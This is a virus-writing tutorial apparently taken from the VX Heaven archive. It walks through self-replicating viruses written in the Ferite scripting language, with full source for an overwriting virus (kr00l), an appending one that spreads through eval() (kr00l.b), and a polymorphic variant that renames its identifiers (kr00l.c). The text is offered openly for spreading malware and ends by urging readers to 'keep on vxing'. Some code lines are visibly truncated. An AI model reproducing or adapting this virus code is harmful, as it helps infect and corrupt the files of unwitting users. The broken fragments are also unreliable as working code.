VX Heaven

Library Collection Sources Engines Constructors Simulators Utilities Links Forum

Ferite virus writing guide


[Back to index] [Comments]
  1. Introduction
  2. The language
  3. Infection
  4. Polymorphism
  5. Final words

1) Introduction

This is my first tutorial :) ... It could contain error or other shit so you are free to contact me and tell me how much I am a d0rk :). Some time ago browsing on the net I found a nice language called "ferite", this tutorial will ( try to ) explain you how to write auto-replicant programs in that language. And now it's time to go!!!!

2) The language

Ferite is a mixed language, if you come from C or better C++ you will find it very simple, but you can use it without any problems even if you are a php or perl programmer. These are some examples of ferite scripting:


        uses "console";
        Console.println("Hello world!");

This is the simplest ferite script, you first need to include the "console" module to do I/O, then we can use the method Console.println() to print a msg on console. This is a very simple example of how to use ferite.

Variables declaration

Ferite allows us to declare many types of variables but for our scope we will need only three data types:


Ferite has the common cycles of the other languages, I will not waste much time on them. Their structures:

                some shit ...
                other shit ...

(note you can use multiple if :))

        for(start_condition; condition_to_verify; thing_to_do_at_every_cycle)
                some code ...

                some code ...

Functions declaration

You can declare functions in ferite like any other language, this is the structure of a function:

        function function_name(parameters)
                code to do ...
                return some_thing;

example code:

        function sum(number a,number b)
                return a + b;

This section is finished, go to virus writing !!!

3) Infection

Ok, now it's the moment to make the real shit. Before starting some useful things:

Getting script path

Example code:


        uses "console","sys";
        string path = Sys.scriptName();
        Console.println("My path is: $path");

Finding victims script


        uses "console","filesystem","sys";
        object current_dir = new Directory(".");
        string files = "";

        while((files = current_dir.getEntry()) != "")
                if(String.index(files,".fe") != -1)
                        Console.println("New victim: $files");

File I/O


        uses "console","sys","filesystem";
        File.create("Hello_world.txt").writeln("Hello world!");

This is an overwriter ferite virus that will explain better all these things:


// Hi, this is an overwriter virus written in ferite ... its name is kr00l
// by [WarGame,#eof] ... you can get ferite here:

uses "console","sys","filesystem";

// useful objects
object folder = new Directory(".");
string found_file = "";
string my_code = "";
number infections = -1; // to avoid counting itself

        // read its code
        my_code =;

        // Let's search
        while((found_file = folder.getEntry()) != "")
                // is it a ferite script ?
                if((String.index(found_file,".fe")) != -1)

        if(infections > 0)
                Console.println("I am kr00l by [WarGame,#eof], [infections:$infections]");


This is the better way to infect a ferite script, I did some experiments with prepending and it didn't work well, so I tried appending and it seems to work quite well. Ferite interpreter checks the validity of the source, for example you can't use "uses" twice or declare variables after functions or other code.

After many hours ( my brain was burning :) ) I found an other way to do it, I used eval(). If you are a perl or php programmer you know what eval() is, it's a function that let you "build" your code and execute it, for example eval('uses "console"; Console.println("I am in eval()"); ');. After having this idea kr00l.b was burn and it infected its first victim :)

This is the code:


        eval('uses "filesystem","sys";function Is_Infected(string fl) { string
        st =; if(String.index(st,"kr00l.b by [WarGame,#eof]")
        != -1) {return 1;} else {return 0;}} string signature =
        "kr00l.b by [WarGame,#eof]";string fl = "";string my_code = "";
        object pr =;string orig = "";object
        dir = new Directory("."); while(String.index((my_code = pr.readln()),
        signature) == -1) {} while((fl = dir.getEntry()) != "") { if(
        String.index(Sys.scriptName(),fl) == -1 && String.index(fl,".fe")
        != -1) { if(!Is_Infected(fl)) { orig =;
        File.remove(fl); File.create(fl).writeln(orig+my_code); } } } ');

        // This is the evolution of the kr00l ferite virus, it appends to
        // victim scripts ... have fun with it by [WarGame,#eof]

How you can see the code is all on one line and it works in a simple way, it finds its victims in the current directory and appends its code at the end of it. Nothing of special only some things to note:

        if(String.index(Sys.scriptName(),fl) == -1 && String.index(fl,".fe") != -1)

This is to check if a found file is or not a ferite script, but I had to add another condition, it is to ensure that the virus itself doesn't get infected and so corrupted.

4) Polymorphism

Polymorphism is simple with ferite, you need only the function Regexp.replaceAll(), with this you can change variables names and functions names to make the virus look different at every infection. No other things to do only an example of appender virus with poly in it:

-- kr00l.c.fe --

        eval('uses "filesystem","sys","regexp","math","string","date";
        function Is_Infected(string fl) { string st =;
        if(String.index(st,"kr00l.c by [WarGame,#eof]") != -1) {return 1;} else
        {return 0;}} function rnd(number sd) { Math.srand(sd); return
        ((Math.rand()%10)+65),((Math.rand()%10)+65));} string signature =
        "kr00l.c by [WarGame,#eof]";string fl = "";string my_code = "";object
        pr =;string orig = "";object dir = new
        Directory("."); while(String.index((my_code = pr.readln()),signature)
        == -1) {} if(1) { my_code = Regexp.replaceAll("signature",my_code,rnd
        (; my_code = Regexp.replaceAll("orig",my_code,rnd
        (; my_code = Regexp.replaceAll("dir",my_code,rnd
        (; my_code = Regexp.replaceAll("fl",my_code,rnd
        (; my_code = Regexp.replaceAll("Is_Infected",my_code,
        rnd(; my_code = Regexp.replaceAll("rnd",my_code,rnd
        (; my_code = Regexp.replaceAll("my_code",my_code,
        rnd(;} while((fl = dir.getEntry()) != "") { if(
        String.index(Sys.scriptName(),fl) == -1 && String.index(fl,".fe")
        != -1) { if(!Is_Infected(fl)) { orig =;
        File.remove(fl); File.create(fl).writeln(orig+my_code); } } } ');

        // Evolution of kr00l.b with poly ... its name is kr00l.c ... by [WarGame,#eof]</p>

Like kr00l.b this virus contained only on one line, the poly works in a very simple way, this is an example: Regexp.replaceAll("signature",my_code,rnd(; , this will change every instance of the variable "signature" with a random generated string. The same is made with the other variables and functions.

5) Final words

I would like to thank the other members of EOF, SkyOut for trusting me and for the big discussion on IRC, berniee and RadiatioN for the help, izee and Nibble for being so friendly with me, and sk0r for his good idea of ransomware. For contact check or send me an email to [email protected] I hope this small tutorial will help you and remember to keep on vxing !!!

"So di non sapere" ( Socrate )

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka